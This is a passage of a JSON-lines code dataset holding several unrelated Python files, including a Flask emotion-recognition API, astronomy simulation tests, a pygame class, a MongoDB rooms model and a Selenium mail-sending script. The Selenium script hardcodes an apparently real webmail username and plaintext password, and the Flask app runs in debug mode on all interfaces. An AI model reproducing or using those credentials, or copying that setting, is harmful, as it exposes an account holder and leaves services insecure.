btools.get_smoothed_background(self.datapattern)\n return background_array, self.corr_factor\n\n def call_cb_enabled(self):\n self.is_enabled = self.bkgtools.cb_enabled.isChecked()\n\n # update config\n config.parser['bkgpattern']['is_enabled'] = str(self.is_enabled)\n\n def call_pb_set_factor(self):\n if not self.datapattern is None:\n bkg_counts = self.datapattern.pattern_matrix.sum()\n else:\n bkg_counts = None\n\n factor_dialog = CorrFactor_dialog(parent_widget=self, corr_factor=self.corr_factor, bkg_counts=bkg_counts)\n if factor_dialog.exec_() == QtWidgets.QDialog.Accepted:\n self.corr_factor = factor_dialog.corr_factor\n self.bkgtools.le_correction_factor.setText(str(self.corr_factor))\n\n # update config\n config.parser['bkgpattern']['corr_factor'] = str(self.corr_factor)\n else:\n # Canceled\n pass\n\n def call_pb_set_sigma(self):\n\n value, ok = QtWidgets.QInputDialog.getDouble(self, 'Gaussian Sigma',\n 'Set the sigma value to be used for smoothing the pattern\\t\\t\\t',\n value=self.smooth_sigma, min=0, decimals = 1)\n if ok:\n self.smooth_sigma = value\n\n self.bkgtools.le_gauss_sigma.setText(str(self.smooth_sigma))\n\n # update config\n config.parser['bkgpattern']['smooth_sigma'] = str(self.smooth_sigma)\n\n def call_p_view_background(self):\n if not self.datapattern_exits():\n return\n\n btools = pyfdd.BackgroundTools()\n btools.set_sigma(self.smooth_sigma)\n background_dp = btools.get_smoothed_background(self.datapattern, as_datapattern=True)\n new_dp_window = DataPattern_window()\n new_dp_window.set_datapattern(background_dp)\n new_dp_window.setWindowTitle('Smoothed Background')\n new_dp_window.show()\n self.dp_external.append(new_dp_window)\n\n\ndef main():\n app = QtWidgets.QApplication(sys.argv)\n window = BkgPattern_window()\n window.show()\n print(window.size())\n sys.exit(app.exec())\n\n\nif __name__ == '__main__':\n main()","repo_name":"edbosne/pyfdd","sub_path":"pyfdd/gui/bkgpattern_interface.py","file_name":"bkgpattern_interface.py","file_ext":"py","file_size_in_byte":10749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"26184325788","text":"from flask import Flask,request,jsonify,Response\nfrom flask_restful import Resource,Api\nfrom PIL import Image,ImageFile\nimport cv2\nimport numpy\nfrom demo import demo\nfrom model import train_model, valid_model\nimport tensorflow as tf\nimport json\nimport sys\nimport base64\n\n\napp = Flask(__name__)\napi = Api(app)\n\n\nflags = tf.app.flags\nflags.DEFINE_string('MODE', 'demo', \n 'Set program to run in different mode, include train, valid and demo.')\nflags.DEFINE_string('checkpoint_dir', './ckpt', \n 'Path to model file.')\nflags.DEFINE_string('train_data', './data/fer2013/fer2013.csv',\n 'Path to training data.')\nflags.DEFINE_string('valid_data', './valid_sets/',\n 'Path to training data.')\nflags.DEFINE_boolean('show_box', False, \n 'If true, the results will show detection box')\nFLAGS = flags.FLAGS\n\nSAMPLE_IMAGE_PATH=\"\"\n\nclass Image_Emotion_Recognition(Resource):\n assert FLAGS.MODE in ('train', 'valid', 'demo')\n def get(self):\n return {\"about\":'abc'}\n \n def post(self):\n \n x=\"\"\n self.bytes_to_img(request.form['img'])\n if FLAGS.MODE == 'demo':\n img = Image.open('temp_file.jpg')\n open_cv_image = numpy.array(img) \n open_cv_image = open_cv_image[:, :, ::-1].copy() \n x=demo(FLAGS.checkpoint_dir, FLAGS.show_box,open_cv_image)\n print(\"test: = \"+str(x))\n elif FLAGS.MODE == 'train':\n train_model(FLAGS.train_data)\n elif FLAGS.MODE == 'valid':\n valid_model(FLAGS.checkpoint_dir, FLAGS.valid_data)\n\n\n return json.loads(x)\n \n def image_to_bytes(self,url):\n with open(\"temp_file.jpg\", \"rb\") as imageFile:\n str = base64.b64encode(imageFile.read())\n return str\n \n def bytes_to_img(self,bytes):\n imgdata = base64.b64decode(bytes)\n filename = 'temp_file.jpg' # I assume you have a way of picking unique filenames\n with open(filename, 'wb') as f:\n f.write(imgdata)\n print('DONE')\n\n\nclass Multi(Resource):\n def get(self,num):\n return {'result':num*10}\n\napi.add_resource(Image_Emotion_Recognition,'/Img_Emotion/')\napi.add_resource(Multi,'/multi/')\n\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0',debug=True)\n\n\n","repo_name":"Taha248/Emotion-Recognition-System","sub_path":"Facial_Emotion_Detection_API/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"33650956186","text":"import pytest\nfrom pytest import approx\nimport numpy as np\n\nfrom scopesim.effects import AtmosphericDispersionCorrection as ADC\nfrom scopesim.effects import AtmosphericDispersion as AD\nfrom scopesim.tests.mocks.py_objects.fov_objects import _centre_fov\n\n\n@pytest.fixture(scope=\"function\")\ndef atmo_params():\n \"\"\"\n airmass = 1.14\n altitude = 2400m\n temperature = 7 deg\n pressure = 0.755 bar\n humidity = ?\n\n Approx atmospheric refraction at 500nm = 24.8 arcsec\n Diff atmo refr relative to 500nm\n - 0.5um : 0 arcsec\n - 1.5um : -0.49 arcsec\n - 2.5um : -0.53 arcsec\n \"\"\"\n _atmo_params = {\"airmass\": 1.14,\n \"temperature\": 7,\n \"humidity\": 0.5,\n \"pressure\": 0.755,\n \"latitude\": -26,\n \"altitude\": 2400,\n \"pupil_angle\": 0,\n \"pixel_scale\": 1,\n \"wave_min\": 0.5,\n \"wave_mid\": 0.5,\n \"wave_max\": 2.5}\n return _atmo_params\n\n\nclass TestInit:\n def test_initialises_when_all_needed_keywords_given(self, atmo_params):\n assert isinstance(ADC(**atmo_params), ADC)\n\n def test_throws_error_when_not_all_keywords_are_provided(self):\n with pytest.raises(ValueError):\n ADC(**{\"its_over\": 9000})\n\n\nclass TestApplyTo:\n def test_does_nothing_when_passed_wrong_type(self, atmo_params):\n adc = ADC(**atmo_params)\n doc_brown = adc.apply_to({\"gigawatts\": 1.21})\n assert doc_brown[\"gigawatts\"] == 1.21\n\n def test_zero_shift_at_zenith(self, atmo_params):\n fov = _centre_fov(n=50, waverange=[1.5, 1.7])\n old_crpix_d = fov.header[\"CRPIX1D\"], fov.header[\"CRPIX2D\"]\n atmo_params[\"airmass\"] = 1.\n adc = ADC(**atmo_params)\n fov_new = adc.apply_to(fov)\n new_crpix_d = fov_new.header[\"CRPIX1D\"], fov_new.header[\"CRPIX2D\"]\n\n assert np.all(old_crpix_d == new_crpix_d)\n\n @pytest.mark.parametrize(\"waves, offset\",\n [([0.4, 0.6], 0.),\n ([1.4, 1.6], 0.490),\n ([2.4, 2.6], 0.528)])\n def test_correct_test_shift_applied_to_image_plane_wcs(self, atmo_params,\n waves, offset):\n fov = _centre_fov(n=10, waverange=waves)\n old_crpix_d = fov.header[\"CRPIX1D\"], fov.header[\"CRPIX2D\"]\n\n adc = ADC(**atmo_params)\n fov_new = adc.apply_to(fov)\n\n new_crpix_d = fov_new.header[\"CRPIX1D\"], fov_new.header[\"CRPIX2D\"]\n\n abs_diff = np.sum((np.array(new_crpix_d) -\n np.array(old_crpix_d))**2)**0.5\n\n # this works because the pixel_scale is 1 arcsec\n assert abs_diff == approx(offset, rel=1e-3)\n assert new_crpix_d[1] == approx(old_crpix_d[1] - offset, rel=1e-3)\n\n\nclass TestCombinedWithAtmoDisp:\n @pytest.mark.parametrize(\"waves\", [(0.7, 0.8), (1.4, 1.6), (2.4, 2.6)])\n @pytest.mark.parametrize(\"angle\", [0, 15, 45, 85, 90])\n @pytest.mark.parametrize(\"pixel_scale\", [0.004, 0.04, 0.4])\n def test_shifts_between_adc_and_ad_are_opposite(self, atmo_params, waves,\n angle, pixel_scale):\n fov_wave_mid = np.average(waves)\n atmo_params[\"pixel_scale\"] = pixel_scale\n atmo_params[\"pupil_angle\"] = angle\n atmo_params[\"sub_pixel_fraction\"] = 0.001\n\n fov = _centre_fov(n=10, waverange=waves)\n fov.header[\"CDELT1\"] = 1 / 3600 * pixel_scale\n fov.header[\"CDELT2\"] = 1 / 3600 * pixel_scale\n old_crpix_d = np.array([fov.header[\"CRPIX1D\"], fov.header[\"CRPIX2D\"]])\n\n ad = AD(**atmo_params)\n adc = ADC(**atmo_params)\n ad_shifts = ad.fov_grid()\n ad_x_shift = np.interp(fov_wave_mid, ad_shifts[0], ad_shifts[1])\n ad_y_shift = np.interp(fov_wave_mid, ad_shifts[0], ad_shifts[2])\n\n adc.apply_to(fov)\n new_crpix_d = np.array([fov.header[\"CRPIX1D\"], fov.header[\"CRPIX2D\"]])\n fov_shifts = new_crpix_d - old_crpix_d\n adc_x_shift = fov_shifts[0] * fov.header[\"CDELT1\"] * 3600\n adc_y_shift = fov_shifts[1] * fov.header[\"CDELT1\"] * 3600\n\n assert adc_x_shift == approx(ad_x_shift, rel=1e-3)\n assert adc_y_shift == approx(ad_y_shift, rel=1e-3)\n","repo_name":"AstarVienna/ScopeSim","sub_path":"scopesim/tests/tests_effects/test_AtmosphericDispersionCorrection.py","file_name":"test_AtmosphericDispersionCorrection.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"2"} +{"seq_id":"6968262545","text":"import pygame\nfrom Enums import Direction, Color, BulletType\nfrom Bullet import Bullet\n\n\nclass Player:\n speed = 1.25\n scale = 3\n respawn_time = 10\n\n def __init__(self, x, y):\n self.is_draw = False\n self.dead = False\n self.respawn_timer = 0\n self.bullets = list()\n self.lives = 2\n self.start_x = x\n self.x = x\n self.y = y\n self.sprite = pygame.transform.scale(\n pygame.image.load(\"Sprites/PlayerSprite.png\"), (13 * self.scale, 8 * self.scale))\n self.rect = self.sprite.get_rect().move((x, y))\n\n def move(self, direction, window_width):\n if self.dead:\n return\n\n if self.x > 0:\n if direction == Direction.LEFT:\n self.x -= self.speed\n if self.x < window_width - self.rect.width:\n if direction == Direction.RIGHT:\n self.x += self.speed\n self.rect.x = self.x\n\n def draw(self, window):\n if not self.dead:\n window.blit(self.sprite, self.rect)\n\n def shoot(self):\n if self.dead:\n return\n\n if len(self.bullets) < 1:\n self.bullets.append(Bullet(self.x, self.y, Color.Cyan, BulletType.Player))\n\n def is_colliding_bullet(self, bullet):\n if self.dead:\n return\n\n if not bullet.bullet_type == BulletType.Player:\n self.dead = self.rect.colliderect(bullet.rect)\n\n return self.dead\n\n def is_colliding_enemy(self, enemy):\n if self.rect.colliderect(enemy.rect):\n self.dead = True\n self.lives = -1\n return True\n return False\n\n def respawn(self):\n if self.respawn_time < self.respawn_timer or self.lives < 0:\n return\n if self.dead:\n self.respawn_timer += 0.1\n if self.respawn_time < self.respawn_timer:\n print(self.lives)\n self.x = self.start_x\n self.rect.x = self.x\n self.respawn_timer = 0\n self.lives -= 1\n self.dead = False\n","repo_name":"xyoouy/SpaceInvaders","sub_path":"Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"16539564910","text":"# -*- coding: utf-8 -*-\n# created by wmin3\nfrom util.ObjectMap import *\nfrom util.KeyBoardUtil import KeyBoardKeys\nfrom util.ClipboardUtil import Clipboard\nfrom util.WaitUtil import WaitUtil\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\n\ndef TestSendMailWithAttachment():\n\n driver = webdriver.Firefox(executable_path=\"C:\\\\WebDriver\\\\geckodriver\")\n driver.maximize_window()\n\n driver.get(\"http://mail.126.com\")\n time.sleep(5)\n assert u\"126网易免费邮\" in driver.page_source\n\n wait = WaitUtil(driver)\n wait.frameToBeAvailableAndSwitchToIt('xpath',\"//iframe[@name='']\")\n username = getElement(driver,\"xpath\",\"//input[@name='email']\")\n username.send_keys(\"minwu126\")\n passwd = getElement(driver, \"xpath\", \"//input[@name='password']\")\n passwd.send_keys(\"wuli8228680\")\n passwd.send_keys(Keys.ENTER)\n time.sleep(10)\n assert u\"网易邮箱\" in driver.title\n\n driver.switch_to.default_content()\n time.sleep(5)\n\n addressBook = wait.visibilityOfElementLocated(\"xpath\",\"//div[text()='通讯录']\")\n addressBook.click()\n newContact = wait.visibilityOfElementLocated(\"xpath\",\"//span[text()='新建联系人']\")\n newContact.click()\n\n contactName = wait.visibilityOfElementLocated(\"xpath\",\"//a[@title='编辑详细姓名']/preceding-sibling::div/input\")\n contactName.send_keys(\"LILY\")\n email = getElement(driver,\"xpath\",\"//*[@id='iaddress_MAIL_wrap']//input\")\n email.send_keys(\"lily@qq.com\")\n getElement(driver,\"xpath\",\"//span[text()='设为星标联系人']/preceding-sibling::span/b\").click()\n\n mobile=getElement(driver,\"xpath\",\"//*[@id='iaddress_TEL_wrap']//dd//input\")\n mobile.send_keys(\"18888888891\")\n\n getElement(driver,\"xpath\",\"//textarea\").send_keys(u\"朋友\") #备注\n getElement(driver,\"xpath\",\"//span[text()='确 定']\").click()\n time.sleep(2)\n\n assert u\"lily@qq.com\" in driver.page_source\n print(u\"添加成功\")\n time.sleep(3)\n getElement(driver,\"xpath\",\"//div[.='首页']\").click()\n time.sleep(2)\n element = wait.visibilityOfElementLocated(\"xpath\",\"//span[text()='写 信']\")\n element.click()\n print(u\"写信\")\n\n receiver = getElement(driver,\"xpath\",\"//div[contains(@id,'_mail_emailinput')]//input\")\n\n receiver.send_keys(\"757693255@qq.com\")\n subject = getElement(driver,\"xpath\",\"//div[@aria-label='邮件主题输入框,请输入邮件主题']/input\")\n subject.send_keys(u\"新邮件\")\n attachment=getElement(driver,\"xpath\",\"//div[@title='点击添加附件']/input[@size='1' and @type='file']\")\n attachment.send_keys(\"d:\\\\a.txt\")\n\n time.sleep(5)\n\n wait.frameToBeAvailableAndSwitchToIt(\"xpath\",\"//iframe[@tabindex=1]\")\n body= getElement(driver,\"xpath\",\"/html/body\")\n body.send_keys(u\"发给自己的一封信\")\n\n driver.switch_to_default_content()\n\n getElement(driver,\"xpath\",\"//header//span[text()='发送']\").click()\n print(u\"开始发送邮件\")\n time.sleep(3)\n assert u\"发送成功\"in driver.page_source\n driver.quit()\n\nif __name__ ==\"__main__\":\n TestSendMailWithAttachment()","repo_name":"AnnWu/DataDrivenFrameWork","sub_path":"testScripts/TestSendMailWithAttachment1.py","file_name":"TestSendMailWithAttachment1.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"38694192392","text":"from bson.json_util import dumps, loads\nfrom server.settings import clientOpen,s3Client\nfrom datetime import datetime\nimport time\n\nclass Rooms:\n\n def __init__(self):\n \n self.client=clientOpen()\n \n\n def creatorPP(self, room_code):\n creator = self.client.myspace.rooms.find_one({\"room_code\":room_code}, {\"creator\":True})[\"creator\"]\n print(creator)\n return creator[\"profile_picture\"]\n\n def getImage(self, id):\n return self.client.auth.profile.find_one({\"_id\":id},{\"profile_picture\":True})[\"profile_picture\"]\n\n def test(self,profile,title,schedule,room_type,users=[]):\n\n return loads(dumps(self.client.auth.profile.find_one({\"_id\":profile})))\n\n def create(self,profile,room_code,title,category,schedule,room_type=None,users=[]):\n data=loads(dumps(self.client.auth.profile.find_one({\"_id\":profile})))\n if not data:\n res={\n \"message\":\"User Not Found\",\n \"status\":True\n }\n return res\n channel_name=data[\"channel_name\"]\n \n if self.client.myspace.rooms.find_one({\"schedule\":schedule, \"creator\":profile}):\n \n raise ValueError(\"Schedule time is already occupied\")\n \n else:\n\n listener=loads(dumps(self.client.auth.profile.find_one({\"_id\":profile})))\n creator={\n \"_id\":listener[\"_id\"],\n \"profile_picture\":listener[\"profile_picture\"],\n \"channel_name\":listener[\"channel_name\"],\n \"name\":listener[\"name\"]\n }\n # room_code = '_'.join(channel_name.split(' '))+\"_\"+'_'.join(title.split(' '))+\"_\"+str(schedule)+\"_\"+str(time.time()).split('.')[0]\n \n room_live_status = False\n # If the schedule time is before or equal to current time then it is live. \n # On Frontend there should also be check for not allowing the before time than current time.\n # Schedule time is divided by 1000 as it is comming in milliseconds \n if datetime.fromtimestamp(schedule / 1000) <= datetime.now():\n room_live_status = True\n \n # add categories in user categories\n # self.client.categories.users.insert_one( {\n # \"_id\": listener[\"_id\"],\n # \"id\": listener[\"_id\"],\n # \"categories\":category,\n # \"sub_cat\":[],\n # \"sub_category\":[]\n # }\n # )\n\n if not room_type:\n \n self.client.myspace.rooms.insert_one({\n # \"_id\":profile+\"_\"+title+\"_\"+str(datetime.utcnow().timestamp()),\n # let mongodb generate id \n \"creator\":creator,\n \"title\":title,\n \"admin\":listener[\"email\"], # store creator email id to use it for join room event.\n \"schedule\":schedule,\n \"private\":room_type,\n \"category\":category,\n \"live\":room_live_status,\n \"room_code\":room_code, # to ensure room_code always unique added datetime.now\n \"listeners\":[],\n \"sub_category\":[], # attributes from liverooms\n \"adminSocket\":\"\",\n \"allowedUsers\":[],\n \"otherUsers\":[],\n \"screenShared\":[],\n \"message\":[]\n })\n \n else:\n listeners=[]\n for i in users:\n listener=self.client.auth.profile.find_one({\"_id\":i})\n listeners.append({\n \"id\":i,\n \"name\":listener[\"name\"],\n \"channelName\":listener[\"channel_name\"],\n \"profilePicture\":listener[\"profile_picture\"] \n })\n\n self.client.myspace.rooms.insert_one({\n # \"_id\":profile+\"_\"+title+\"_\"+str(datetime.utcnow().timestamp()),\n # let mongodb generate id \n \"creator\":creator,\n \"title\":title,\n \"admin\":listener[\"email\"], \n \"schedule\":schedule,\n \"private\":room_type,\n \"category\":category,\n \"live\":room_live_status,\n \"room_code\":room_code, # add time.time to ensure room_code always unique\n \"listeners\":listeners,\n \"sub_category\":[], # attributes from liverooms\n \"adminSocket\":\"\",\n \"allowedUsers\":[],\n \"otherUsers\":[],\n \"screenShared\":[],\n \"message\":[]\n })\n # return room code \n return room_code\n\n def get(self, room_name):\n \n room_details=loads(dumps(self.client.myspace.rooms.find_one({\"room_code\":room_name})))\n if room_details:\n res = {\n \"message\":\"Success\",\n \"data\":{\n \"room\":room_details\n },\n \"status\":True\n }\n\n else:\n res={\n \"message\":\"Room Not Found\",\n \"status\":False\n }\n\n return res\n\n def status(self, room_code, user_id):\n room=loads(dumps(self.client.myspace.rooms.find_one({\"room_code\":room_code})))\n\n if len(room[\"listeners\"])==10:\n return \"Room is full\"\n\n if user_id in room[\"listeners\"]:\n return \"Listener already exist\"\n\n def getCreator(self, room_code):\n return loads(dumps(self.client.myspace.rooms.find_one({\"room_code\":room_code})))[\"creator\"]\n\n def storePending(self, room_code, user_id):\n print('storePending')\n listener=self.client.auth.profile.find_one({\"_id\":user_id})\n r=self.client.myspace.pending.find_one({\"id\":room_code})\n if r:\n print('r')\n \n for i in r[\"listeners_pending\"]:\n if i[\"id\"]==user_id:\n return \"User Already Exist in Pending List\"\n\n self.client.myspace.pending.update({\"id\":room_code},\n {\n \"$push\":{\n \"listeners_pending\":{\n \"id\":listener[\"_id\"],\n \"name\":listener[\"name\"],\n \"channelName\":listener[\"channel_name\"],\n \"profilePicture\":listener[\"profile_picture\"]\n }\n }\n }\n )\n\n else:\n print('iserting')\n self.client.myspace.pending.insert_one({\n \"id\":room_code,\n \"listeners_pending\":[{\n \"id\":listener[\"_id\"],\n \"name\":listener[\"name\"],\n \"channelName\":listener[\"channel_name\"],\n \"profilePicture\":listener[\"profile_picture\"]\n }]\n }\n )\n return \"User added to pending list\"\n \n def acceptPending(self, room_code, permitted):\n print('called accept pending')\n\n if not self.client.myspace.rooms.find_one({\"room_code\":room_code}):\n raise \"Invalid Room Code\"\n listeners=[]\n for i in permitted:\n listener=self.client.auth.profile.find_one({\"_id\":i})\n listeners.append({\n \"id\": i,\n \"name\":listener[\"name\"],\n \"channelName\":listener[\"channel_name\"],\n \"profilePicture\":listener[\"profile_picture\"]\n })\n print('checking for status listenrs')\n for i in permitted:\n listener=self.client.auth.profile.find_one({\"_id\":i})\n \n self.client.myspace.pending.update_one({\"id\":room_code},\n {\n \"$pull\":{\n \"listeners_pending\":{\n \"id\": i,\n \"name\":listener[\"name\"],\n \"channelName\":listener[\"channel_name\"],\n \"profilePicture\":listener[\"profile_picture\"]\n }\n }\n }\n )\n for listener in listeners:\n self.client.myspace.rooms.update_one({\"room_code\":room_code},\n {\n \"$push\":{\n \"listeners\":listener\n }\n }\n )\n print('permission added')\n return \"Permission Granted\"\n\n\n def addPublic(self, room_name, user_id):\n listener=loads(dumps(self.client.auth.profile.find_one({\"_id\":user_id})))\n print(listener)\n if not listener:\n print('listners no found')\n return \"Listner Not found\"\n room=loads(dumps(self.client.myspace.rooms.find_one({\"room_code\":room_name})))\n if not room:\n print('not found room')\n return \"Room not found\"\n \n self.client.myspace.rooms.update_one({\"room_code\":room_name},\n {\n \"$push\":{\n \"listeners\":{\n \"id\":listener[\"_id\"],\n \"name\":listener[\"name\"],\n \"channelName\":listener[\"channel_name\"],\n \"profilePicture\":listener[\"profile_picture\"]\n }\n }\n }\n )\n print('listners added')\n return \"Listener added\" \n\n\n def remove_listner(self,profile,room_name):\n listener=loads(dumps(self.client.auth.profile.find_one({\"_id\":profile})))\n if not listener:\n res={\n \"message\":\"User Not Found\",\n \"status\":True\n }\n return res\n data=self.client.myspace.rooms.find_one({\"room_code\":room_name})\n if not data:\n res={\n \"message\":\"Room not found\",\n \"status\":True\n }\n return res\n\n self.client.myspace.rooms.update_one({\"room_code\":room_name},\n {\n \"$pull\":{\n \"listeners\":{\n \"id\":listener[\"_id\"],\n \"name\":listener[\"name\"],\n \"channelName\":listener[\"channel_name\"],\n \"profilePicture\":listener[\"profile_picture\"]\n }\n }\n }\n )\n res={\n \"message\":\"listner Removed from room\",\n \"status\":True\n }\n return res\n\n def getlive_rooms(self):\n return loads(dumps(self.client.myspace.rooms.find( {\"live\":True} )))\n\n def start_room(self,room_name,sdpCandidate,sdpMLineIndex,sdpMid,serverUrl,type):\n room_details = loads(dumps(self.client.myspace.rooms.find_one({\"room_code\":room_name})))\n if room_details:\n self.client.myspace.rooms.update_one({\"room_code\":room_name} ,{\"$set\": { \"live\":True,\"start_time\":str(datetime.utcnow().timestamp()),\n \"sdpCandidate\":sdpCandidate, \"sdpMLineIndex\":sdpMLineIndex,\"sdpMid\":sdpMid, \"serverUrl\":serverUrl, \"type\":type}})\n res={\n \"message\":\"Room ready to go live\",\n \"status\":True\n }\n else:\n res={\n \"message\":\"Room Not Found\",\n \"status\":False\n }\n return res\n\n def delete(self,room_name):\n room_details = loads(dumps(self.client.myspace.rooms.find_one({\"room_code\":room_name})))\n if room_details:\n self.client.myspace.rooms.delete_one({\"room_code\":room_name})\n res={\n \"message\":\"Room deleted\",\n \"status\":True\n }\n else:\n res={\n \"message\":\"Room Not Found\",\n \"status\":False\n }\n return res\n\n def save_SDP(self,room_name,profile,sdpCandidate,sdpMLineIndex,sdpMid,serverUrl,type):\n user=self.client.auth.profile.find_one({\"_id\":profile})\n if not user:\n res={\n \"message\":\"User Not Found\",\n \"status\":True\n }\n\n room_details = loads(dumps(self.client.myspace.rooms.find_one({\"room_code\":room_name})))\n if room_details:\n self.client.myspace.rooms.update_one({\"room_code\":room_name},\n {\n \"$pull\":{\n \"listeners\":{\n \"_id\":profile\n }\n }\n })\n self.client.myspace.rooms.update_one({\"room_code\":room_name},\n {\n \"$push\":{\n \"listeners\":{\n \"_id\":profile,\n \"name\":user[\"name\"],\n \"profilePicture\":user[\"profile_picture\"],\n \"channelName\":user[\"channel_name\"],\n \"sdpCandidate\":sdpCandidate, \n \"sdpMLineIndex\":sdpMLineIndex,\n \"sdpMid\":sdpMid, \n \"serverUrl\":serverUrl, \n \"type\":type,\n }\n }\n })\n \n res={\n \"message\":\"Credentials Saved\",\n \"status\":True\n }\n else:\n res={\n \"message\":\"Room Not Found\",\n \"status\":False\n }\n return res\n\n def get_savedrooms(self,profile):\n return loads(dumps(self.client.myspace.savedrooms.find({\"creator\":{\"_id\":profile}})))\n\n\n def token(self, profile):\n print('token found is ',self.client.notifications.tokens.find_one({\"profile\":profile},{\"token\":True})[\"token\"])\n return self.client.notifications.tokens.find_one({\"profile\":profile},{\"token\":True})[\"token\"]\n\n def getPending(self, room_code, user_id):\n return loads(dumps(self.client.myspace.pending.find({\"id\":room_code})))\n\n def getChannelName(self, user_id):\n return self.client.auth.profile.find_one({\"_id\":user_id},{\"channel_name\":True})[\"channel_name\"]\n\n def allRooms(self):\n return loads(dumps(self.client.myspace.rooms.find()))\n \n def prevRoomListners(self,user_id):\n \"\"\"\n Get the listners of the previous room of the user\n \"\"\"\n rooms = loads(dumps(self.client.myspace.rooms.find({\"creator._id\": user_id}).sort(\"schedule\", -1).limit(1)))\n listners = []\n if len(rooms) > 0 and len(rooms[0][\"listeners\"]) > 0:\n for users in rooms[0][\"listeners\"]:\n user_profile = self.client.auth.profile.find_one({\"_id\": users[\"id\"]})\n listners.append({\n \"id\": user_profile[\"_id\"],\n \"name\": user_profile[\"name\"],\n \"channelName\": user_profile[\"channel_name\"],\n \"profilePicture\": user_profile[\"profile_picture\"],\n \"follower\": len(user_profile[\"follower\"]),\n \"following\": len(user_profile[\"following\"]),\n \"area_of_expert\": user_profile[\"area_of_expert\"]\n })\n return listners\n\n return []\n \n \n def uploadThumbnail(self, room_code, file):\n\n try:\n self.client.myspace.rooms.update_one({\"room_code\":room_code},{\"$set\":{\"thumbnail\":file}})\n return True\n except:\n return False\n \n def close(self):\n self.client.close()\n","repo_name":"ranshu1601/backend-rooms-testing","sub_path":"rooms/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"31791103554","text":"\"\"\"\r\nModel to simulate customer service with customers arriving interval following Poisson distribution (rate=1)\r\nand service times following Exponential distribution. Each customer has a patience (uniformly distributed)\r\nand does not wait longer than the patience interval.\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n\r\ndef Served(arr, ser, pat):\r\n\r\n time_counter=0\r\n time_last_customer=0\r\n customer_wait_times = {}\r\n customer_total_time = {}\r\n served = {}\r\n for customer in range(len(arr)):\r\n time_counter+=arr[customer]\r\n wait = max(0,time_last_customer-arr[customer])\r\n\r\n if wait>pat[customer]:\r\n served[customer+1] = 0\r\n ser[customer] = 0\r\n customer_total_time[customer+1] = pat[customer]\r\n time_last_customer = wait - arr[customer]\r\n else:\r\n served[customer+1] = 1\r\n service_time = ser[customer]\r\n\r\n time_last_customer = service_time + wait\r\n customer_total_time[customer+1] = wait + service_time\r\n\r\n\r\n customer_wait_times[customer+1] = wait\r\n # customer_total_time[customer+1] = wait + service_time\r\n\r\n\r\n return customer_wait_times, customer_total_time, served\r\n\r\n\r\narrival_mean = 1\r\nservice_mean = 2\r\nl = 1/service_mean\r\n\r\nsimulations = 1000\r\nwait50=0\r\ntotal50=0\r\nserved50=0\r\nm = 500\r\nfor s in range(simulations):\r\n if s%100==0:\r\n print('Simulation cycles completed:',s)\r\n\r\n arr = np.random.poisson(1, m)\r\n ser = np.random.exponential(l, m)\r\n pat = np.random.uniform(0.3, 0.7, m)\r\n\r\n wait, total, served = Served(arr, ser, pat)\r\n wait50+=wait[50]\r\n total50+=total[50]\r\n served50+=served[50]\r\n\r\n\r\nd = {'CustomerNo':wait.keys(),\r\n 'ArrivalTime':arr,\r\n 'ServiceTime':ser,\r\n 'Patience': pat,\r\n 'WaitTime':wait.values(),\r\n 'TotalTime':total.values(),\r\n 'Served':served.values()}\r\ndf = pd.DataFrame(d)\r\ndf.to_csv('simulation.csv', index=False)\r\nprint('Average Service time of the 50th customer is:',total50/1000)\r\nprint('Average Wait time of the 50th customer is:',wait50/1000)\r\nprint('Probability of the 50th customer being served is:', served50/1000)","repo_name":"nsus1103/simulation","sub_path":"customer-service-simulation.py","file_name":"customer-service-simulation.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"33866774883","text":"\"\"\"\nThis module sets up the database that will be used\n\"\"\"\nfrom contextlib import closing\nfrom flask import current_app\nimport psycopg2\nimport os\nfrom app import create_app\n\n\ndef init_db():\n \"\"\"Set up the database to stode the user data\n \"\"\"\n db_url = current_app.config['DATABASE_URL']\n # import pdb;pdb.set_trace()\n conn = psycopg2.connect(db_url)\n with conn as conn, conn.cursor() as cursor:\n with current_app.open_resource('stackovflow.sql', mode='r') as sql:\n cursor.execute(sql.read())\n conn.commit()\n return conn\n\n\ndef connect_to(url):\n conn = psycopg2.connect(url)\n return conn\n\n\ndef _init_db():\n conn = connect_to(os.getenv('DATABASE_TEST_URL'))\n destroy()\n with conn as conn, conn.cursor() as cursor:\n with current_app.open_resource('stackovflow.sql', mode='r') as sql:\n cursor.execute(sql.read())\n conn.commit()\n return conn\n\n\ndef destroy():\n test_url = os.getenv('DATABASE_TEST_URL')\n conn = connect_to(test_url)\n curr = conn.cursor()\n comments = \"DROP TABLE IF EXISTS comments CASCADE\"\n answers = \"DROP TABLE IF EXISTS answers CASCADE\"\n questions = \"DROP TABLE IF EXISTS questions CASCADE\"\n users = \"DROP TABLE IF EXISTS users CASCADE\"\n queries = [comments, answers, questions, users]\n try:\n for query in queries:\n curr.execute(query)\n conn.commit()\n except:\n print(\"Fail\")\n","repo_name":"ogol254/stackoverflow","sub_path":"app/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"15854338516","text":"import os\nimport random\nimport xml.etree.ElementTree as ET\n\nfrom glob import glob\n\ndef get_classes(classes_path):\n with open(classes_path, encoding='utf-8') as f:\n class_names = f.readlines()\n class_names = [c.strip() for c in class_names]\n return class_names, len(class_names)\n\n#--------------------------------------------------------------------------------------------------------------------------------#\n# 